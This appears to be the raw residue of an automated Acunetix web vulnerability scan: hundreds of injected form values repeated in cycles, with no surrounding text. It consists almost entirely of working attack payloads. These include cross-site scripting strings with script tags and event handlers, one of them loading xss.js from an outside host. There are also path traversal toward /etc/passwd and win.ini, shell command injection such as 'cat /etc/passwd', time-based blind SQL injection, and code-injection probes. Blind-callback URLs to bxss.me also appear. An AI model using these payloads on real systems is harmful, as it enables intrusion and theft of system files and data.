1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(976168)>

1

'

1

1

-1))

1

acunetix_wvs_invalid_filename

&dir

"

1<img src=xyz OnErRor=prompt(932063)>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

zbbXUAB9'

1

http://hit8ww77uGVQX.bxss.me/

1

comments

1

1<img/src=">" onerror=alert(923971)>

${@print(md5(acunetix_wvs_security_test))}

E4xO3co1')

................etc/passwd

'&dir&'

1<ScRiPt%20>prompt(933241)</sCripT>

1

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

GBAtdu90'))

1

1

1&lt

comments/.

1

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

<img acu onmouseover=prompt(907416) //>

"&dir&"

1

1<input autofocus onfocus=prompt(910348)>

1

http://www.acunetix.tst

1

1

file:///etc/passwd

1

1

1

'"

<a href='http://www.acunetix.com'>website security</a>

/\../\../\../\../\../\../\../etc/passwd

1'"()&%<ScRiPt >prompt(997945)</ScRiPt>

1

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

<!--

WEB-INF/web.xml

|dir

'"()&%<ScRiPt >prompt(967682)</ScRiPt>

1

response.write(9022227*9269929)

1

1

1_WwoJo <ScRiPt >prompt(996738)</ScRiPt>

'|dir

'+response.write(9022227*9269929)+'

1_957977

1

1

1

WEB-INF\web.xml

"+response.write(9022227*9269929)+"

1

1

"|dir

&cat /etc/passwd&

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

../../../../../../../../../../windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../boot.ini

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

cat /etc/passwd

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1

1

1

windowswin.ini

acu3834<s1﹥s2ʺs3ʹuca3834

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

${100225+99009}

acux2399z1z2abcxuca2399

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

................windowswin.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1some_inexistent_file_with_long_name%00.jpg

1<ScRiPt >prompt(939813)</ScRiPt>

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

..\..\..\..\..\..\..\..\windows\win.ini

1&n924819=v999743

1

1<script>prompt(936950)</script>

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

testasp.vulnweb.com

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<ScRiPt >prompt(927175)</ScRiPt>

1

"|"ld

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?906588></ScRiPt>

1

-1)

)

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(975083)</ScRiPt>

-1))

1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

jHGeCKGu'

1<video><source onerror="javascript:prompt(950560)">

!(()&&!|*|*|

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

'"()

nRjf4jiW')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(951459)"></g></svg>

/etc/passwd

1

^(#$!@#$)(()))******

1

1

1

"

1<div style=width:expression(prompt(905411))>

EjiazH76'))

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

||cat /etc/passwd

1

1<iframe src='data:text/html

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

'

1

1<body onload=prompt(910988)>

http://testasp.vulnweb.com/t/xss.html?%00.jpg

WEB-INF/web.xml

1

1

1

"

-1))

&dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(987815)>

1

1

................etc/passwd

WEB-INF\web.xml

${@print(md5(acunetix_wvs_security_test))}

1

'&dir&'

xK2ajael'

1

http://hitpfDeOlb4OD.bxss.me/

1<img src=xyz OnErRor=prompt(963515)>

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

"&dir&"

1<img/src=">" onerror=alert(943210)>

EhzWcDCR')

1

1

comments

file:///etc/passwd

1

1

1

1<ScRiPt%20>prompt(984013)</sCripT>

1

comments

agrqpE8H'))

1

/\../\../\../\../\../\../\../etc/passwd

1

|dir

1

1

1

comments/.

1&lt

1

WEB-INF/web.xml

1

1

1

1

1

PQ5xa55D'))

'|dir

<img acu onmouseover=prompt(930199) //>

1

WEB-INF\web.xml

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

1<input autofocus onfocus=prompt(905052)>

1

"|dir

1

../../../../../../../../../../windows/win.ini

'"

http://www.acunetix.tst

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

<!--

1'"()&%<ScRiPt >prompt(972650)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

'"()&%<ScRiPt >prompt(977707)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

response.write(9830590*9657174)

1_P46GO <ScRiPt >prompt(905203)</ScRiPt>

1

1

1

1_959705

1

&cat /etc/passwd&

windowswin.ini

1

'+response.write(9830590*9657174)+'

1

1

1

"+response.write(9830590*9657174)+"

................windowswin.ini

'&cat /etc/passwd&'

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

1

cat /etc/passwd

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

`cat /etc/passwd`

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${100119+100261}

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

|cat /etc/passwd#

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

acu6031<s1﹥s2ʺs3ʹuca6031

1&n936045=v986455

'|'ld

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

acux3262z1z2abcxuca3262

1some_inexistent_file_with_long_name%00.jpg

1

1

"|"ld

if(now()=sysdate(),sleep(7.188),0)/*'XOR(if(now()=sysdate(),sleep(7.188),0))OR'"XOR(if(now()=sysdate(),sleep(7.188),0))OR"*/

)

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<ScRiPt >prompt(994443)</ScRiPt>

WEB-INF/web.xml

1

(select(0)from(select(sleep(7.188)))v)/*'+(select(0)from(select(sleep(7.188)))v)+'"+(select(0)from(select(sleep(7.188)))v)+"*/

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

!(()&&!|*|*|

1

1<script>prompt(922854)</script>

WEB-INF\web.xml

-1

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

^(#$!@#$)(()))******

'

1<ScRiPt >prompt(967074)</ScRiPt>

-1)

1

1

1

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?902323></ScRiPt>

/etc/passwd

-1))

1

1

1

1

"

1

1<ScRiPt >prompt(926813)</ScRiPt>

1

1

6KcWxOPC'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

||cat /etc/passwd

1

1<video><source onerror="javascript:prompt(963118)">

'"()

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

QSlfK8Fa')

&dir

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936889)"></g></svg>

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

................etc/passwd

'&dir&'

1

E7L8mybY'))

"

1<div style=width:expression(prompt(993646))>

1

1

1

1

-1

${@print(md5(acunetix_wvs_security_test))}

1<iframe src='data:text/html

"&dir&"

1

http://hitlbHgsmVem9.bxss.me/

1

file:///etc/passwd

-1)

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<body onload=prompt(983167)>

1

acunetix_wvs_invalid_filename

-1))

1

1

/\../\../\../\../\../\../\../etc/passwd

|dir

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(973711)>

1

comments

SyI2yPEJ'

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=xyz OnErRor=prompt(968936)>

1

comments

WWg1eS5i')

'|dir

WEB-INF/web.xml

comments/.

1

1

1<img/src=">" onerror=alert(947918)>

http://www.acunetix.tst

utY1cRoQ'))

1

1

1

'"

1

1<ScRiPt%20>prompt(919720)</sCripT>

1

WEB-INF\web.xml

"|dir

1

1

<!--

1

1

1

1&lt

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

<img acu onmouseover=prompt(951864) //>

1

1'"()&%<ScRiPt >prompt(990833)</ScRiPt>

1

1<input autofocus onfocus=prompt(943300)>

../../../../../../../../../../boot.ini

1

1

'"()&%<ScRiPt >prompt(993810)</ScRiPt>

&cat /etc/passwd&

response.write(9330999*9549624)

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

<a href='http://www.acunetix.com'>website security</a>

1_925161

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

'+response.write(9330999*9549624)+'

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

windowswin.ini

"+response.write(9330999*9549624)+"

1

1_H3v6F <ScRiPt >prompt(949611)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

................windowswin.ini

1

1

1

1

cat /etc/passwd

1

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

`cat /etc/passwd`

../../../../../../../../../../etc/passwd

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

1

acu9616<s1﹥s2ʺs3ʹuca9616

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

${99471+100215}

1

1

|cat /etc/passwd#

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

../../../../../../../../../../etc/passwd.jpg

acux1448z1z2abcxuca1448

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1

1<ScRiPt >prompt(912212)</ScRiPt>

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

"|"ld

1

1&n976573=v993832

1

-1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<script>prompt(919357)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

WEB-INF/web.xml

-1)

testasp.vulnweb.com

1

1<ScRiPt >prompt(919406)</ScRiPt>

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

'

1

1

!(()&&!|*|*|

WEB-INF\web.xml

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?919460></ScRiPt>

zbPQgZD7'

"

1

1

^(#$!@#$)(()))******

.\./.\./.\./.\./.\./.\./etc/passwd

'"()

atILkNIT')

1

||cat /etc/passwd

1

1<ScRiPt >prompt(936688)</ScRiPt>

1

/etc/passwd

1

1

adDPtrh6'))

1

1<video><source onerror="javascript:prompt(948899)">

1

1

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

-1

1

'&dir&'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974322)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

'

-1)

"&dir&"

1<div style=width:expression(prompt(936026))>

1

1

1

-1))

1

"

1

................etc/passwd

1

|dir

http://hitKtBcwrzXZj.bxss.me/

1<iframe src='data:text/html

BMeiH33E'

1

1

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}

1

1

1

1<body onload=prompt(978945)>

cRdndLjM')

'|dir

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

comments

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(949218)>

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

0okS2agH'))

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1<img src=xyz OnErRor=prompt(999415)>

comments

1

http://www.acunetix.tst

WEB-INF/web.xml

1

1

1

'"

1

comments/.

1

1<img/src=">" onerror=alert(933556)>

1

<!--

1'"()&%<ScRiPt >prompt(942267)</ScRiPt>

1

WEB-INF\web.xml

1

1

1

1<ScRiPt%20>prompt(925388)</sCripT>

1

'"()&%<ScRiPt >prompt(924551)</ScRiPt>

1

1

1&lt

1

../../../../../../../../../../windows/win.ini

1

1

response.write(9207226*9314458)

1_943357

1

1

1

<img acu onmouseover=prompt(917076) //>

'+response.write(9207226*9314458)+'

1

1

1

../../../../../../../../../../boot.ini

1<input autofocus onfocus=prompt(948076)>

"+response.write(9207226*9314458)+"

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../windows/win.ini.jpg

1

&cat /etc/passwd&

1

1

[url=http://www.acunetix.com]website security[/url]

windowswin.ini

1

1_ChjQo <ScRiPt >prompt(982414)</ScRiPt>

1

'&cat /etc/passwd&'

1

1

................windowswin.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

cat /etc/passwd

1

1

1

1

`cat /etc/passwd`

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

../../../../../../../../../../etc/passwd

1

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

|cat /etc/passwd#

${100193+99437}

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

acu9545<s1﹥s2ʺs3ʹuca9545

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../../../../../../../../../../etc/passwd.jpg

1

acux2007z1z2abcxuca2007

1

1&n942501=v982497

WEB-INF/web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"|"ld

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt >prompt(912980)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

WEB-INF\web.xml

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<script>prompt(911219)</script>

1

)

testasp.vulnweb.com

1

'

-1

1

1

1<ScRiPt >prompt(951480)</ScRiPt>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

-1)

1

1

"

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?917373></ScRiPt>

1

1

-1))

.\./.\./.\./.\./.\./.\./etc/passwd

1

1

1

^(#$!@#$)(()))******

1

1<ScRiPt >prompt(926279)</ScRiPt>

7cCJDh6I'

||cat /etc/passwd

1

1

1

1

/etc/passwd

1<video><source onerror="javascript:prompt(983095)">

&dir

'"()

1

UQzomOGE')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961290)"></g></svg>

1

1

'&dir&'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1rWmP6Jn'))

1

1

1<div style=width:expression(prompt(915404))>

1

1

'

1

"&dir&"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

-1

1<iframe src='data:text/html

"

1

1

http://hitoLp5HQ2nB8.bxss.me/

1

acunetix_wvs_invalid_filename

|dir

................etc/passwd

1<body onload=prompt(989351)>

-1)

${@print(md5(acunetix_wvs_security_test))}

1

comments

'|dir

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(901456)>

-1))

1

comments/.

1

1

1

"|dir

http://www.acunetix.tst

1<img src=xyz OnErRor=prompt(971744)>

keJklD7V'

1

'"

file:///etc/passwd

1

1<img/src=">" onerror=alert(945510)>

1

1

qzEyC8rB')

1'"()&%<ScRiPt >prompt(934562)</ScRiPt>

<!--

1

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(972707)</sCripT>

1

g8P4ULLH'))

1

1

'"()&%<ScRiPt >prompt(949483)</ScRiPt>

1

1

1

WEB-INF/web.xml

1&lt

1

1

1

1_953590

response.write(9152361*9994389)

1

1

1

WEB-INF\web.xml

1

<img acu onmouseover=prompt(968471) //>

1

'+response.write(9152361*9994389)+'

1

../../../../../../../../../../windows/win.ini

1<input autofocus onfocus=prompt(997971)>

1

&cat /etc/passwd&

1

1

"+response.write(9152361*9994389)+"

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

1

1

1

[url=http://www.acunetix.com]website security[/url]

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_pnUZA <ScRiPt >prompt(946518)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

windowswin.ini

cat /etc/passwd

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

................windowswin.ini

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

..\..\..\..\..\..\..\..\windows\win.ini

|cat /etc/passwd#

1

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

/.\./.\./.\./.\./.\./.\./windows/win.ini

'|'ld

acu9132<s1﹥s2ʺs3ʹuca9132

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1

1

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

acux7100z1z2abcxuca7100

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

${99239+99385}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<ScRiPt >prompt(913655)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<script>prompt(967803)</script>

1

-1)

1some_inexistent_file_with_long_name%00.jpg

'

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

1&n957976=v987314

-1))

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"

1

1<ScRiPt >prompt(923314)</ScRiPt>

1

WEB-INF/web.xml

1

/etc/passwd

testasp.vulnweb.com

NJAiDTLi'

||cat /etc/passwd

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?962679></ScRiPt>

1

1

)

tVxRe5qX')

WEB-INF\web.xml

1

1

1

&dir

1

1<ScRiPt >prompt(900162)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

!(()&&!|*|*|

tbaHSIJR'))

1

1

1

1

1<video><source onerror="javascript:prompt(921428)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

-1

^(#$!@#$)(()))******

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(988743)"></g></svg>

1

"&dir&"

................etc/passwd

1

-1)

1

1

'"()

1<div style=width:expression(prompt(926469))>

1

1

1

-1))

1

|dir

1<iframe src='data:text/html

http://testasp.vulnweb.com/t/xss.html?%00.jpg

file:///etc/passwd

1

1

Cy2zOXFp'

'

1

'|dir

1

1<body onload=prompt(945394)>

1

1

http://hitmh14nyat8H.bxss.me/

"

fdL7tmMG')

1

/\../\../\../\../\../\../\../etc/passwd

1

acunetix_wvs_invalid_filename

"|dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(906951)>

${@print(md5(acunetix_wvs_security_test))}

6HPbmIoN'))

1

1

comments

1

WEB-INF/web.xml

${@print(md5(acunetix_wvs_security_test))}\

1<img src=xyz OnErRor=prompt(970000)>

1

1

http://www.acunetix.tst

'"

comments

1

1<img/src=">" onerror=alert(934708)>

1

1

1'"()&%<ScRiPt >prompt(946519)</ScRiPt>

WEB-INF\web.xml

1

<!--

1<ScRiPt%20>prompt(942390)</sCripT>

comments/.

1

'"()&%<ScRiPt >prompt(964495)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

1

1&lt

1

1_923968

1

1

1

../../../../../../../../../../boot.ini

<img acu onmouseover=prompt(902442) //>

1

1

response.write(9388775*9594275)

1

1

1

1<input autofocus onfocus=prompt(904955)>

1

'+response.write(9388775*9594275)+'

1

../../../../../../../../../../windows/win.ini.jpg

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

"+response.write(9388775*9594275)+"

1

&cat /etc/passwd&

windowswin.ini

[url=http://www.acunetix.com]website security[/url]

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1_qIjWb <ScRiPt >prompt(972587)</ScRiPt>

................windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..\..\..\..\..\..\..\..\windows\win.ini

cat /etc/passwd

1

1

../../../../../../../../../../etc/passwd

1

1

`cat /etc/passwd`

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

|cat /etc/passwd#

acu1640<s1﹥s2ʺs3ʹuca1640

${100071+99017}

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

acux7445z1z2abcxuca7445

1

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

1&n934402=v986292

1<ScRiPt >prompt(960648)</ScRiPt>

1

"|"ld

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1some_inexistent_file_with_long_name%00.jpg

1

1<script>prompt(939786)</script>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

WEB-INF/web.xml

1<ScRiPt >prompt(915409)</ScRiPt>

1

-1

)

testasp.vulnweb.com

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?940236></ScRiPt>

-1)

1

'

!(()&&!|*|*|

WEB-INF\web.xml

1

-1))

1<ScRiPt >prompt(939606)</ScRiPt>

1

1

.\./.\./.\./.\./.\./.\./etc/passwd

1

"

^(#$!@#$)(()))******

1<video><source onerror="javascript:prompt(939370)">

h27EWBP6'

1

1

1

||cat /etc/passwd

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(985820)"></g></svg>

hYxcDnZC')

1

1

/etc/passwd

1

'"()

1

&dir

1

1

BOY7OI2H'))

1<div style=width:expression(prompt(915184))>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'&dir&'

1

1

-1

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1<iframe src='data:text/html

1

'

"&dir&"

-1)

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

1<body onload=prompt(959575)>

"

acunetix_wvs_invalid_filename

-1))

http://hitQzFK0U5bqD.bxss.me/

1

................etc/passwd

|dir

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(970699)>

${@print(md5(acunetix_wvs_security_test))}

1

xtKgzVWB'

comments

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1<img src=xyz OnErRor=prompt(997395)>

jNbwqdas')

comments

'|dir

1

file:///etc/passwd

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

comments/.

MYoodmsW'))

1

1

1<img/src=">" onerror=alert(933345)>

1

1

1

1

"|dir

/\../\../\../\../\../\../\../etc/passwd

1

1

1<ScRiPt%20>prompt(912342)</sCripT>

'"

1

1

1

WEB-INF/web.xml

1

<!--

1&lt

1

1

1

<img acu onmouseover=prompt(967433) //>

1

WEB-INF\web.xml

1

1

1

1

1

1'"()&%<ScRiPt >prompt(915826)</ScRiPt>

1<input autofocus onfocus=prompt(930832)>

1

response.write(9684515*9658490)

../../../../../../../../../../windows/win.ini

1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

'"()&%<ScRiPt >prompt(995717)</ScRiPt>

'+response.write(9684515*9658490)+'

&cat /etc/passwd&

1

1

../../../../../../../../../../boot.ini

[url=http://www.acunetix.com]website security[/url]

1

"+response.write(9684515*9658490)+"

1

'&cat /etc/passwd&'

1_936516

1

1

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1_RrHyP <ScRiPt >prompt(967798)</ScRiPt>

1

1

1

"&cat /etc/passwd&"

1

1

1

windowswin.ini

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

................windowswin.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

acu10119<s1﹥s2ʺs3ʹuca10119

1

1

1

../../../../../../../../../../etc/passwd.jpg

|cat /etc/passwd#

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

${100444+99899}

/.\./.\./.\./.\./.\./.\./windows/win.ini

1

acux2668z1z2abcxuca2668

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

'|'ld

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<ScRiPt >prompt(980628)</ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1some_inexistent_file_with_long_name%00.jpg

1&n926977=v941770

-1

1<script>prompt(957746)</script>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

)

"|"ld

1<ScRiPt >prompt(939187)</ScRiPt>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1)

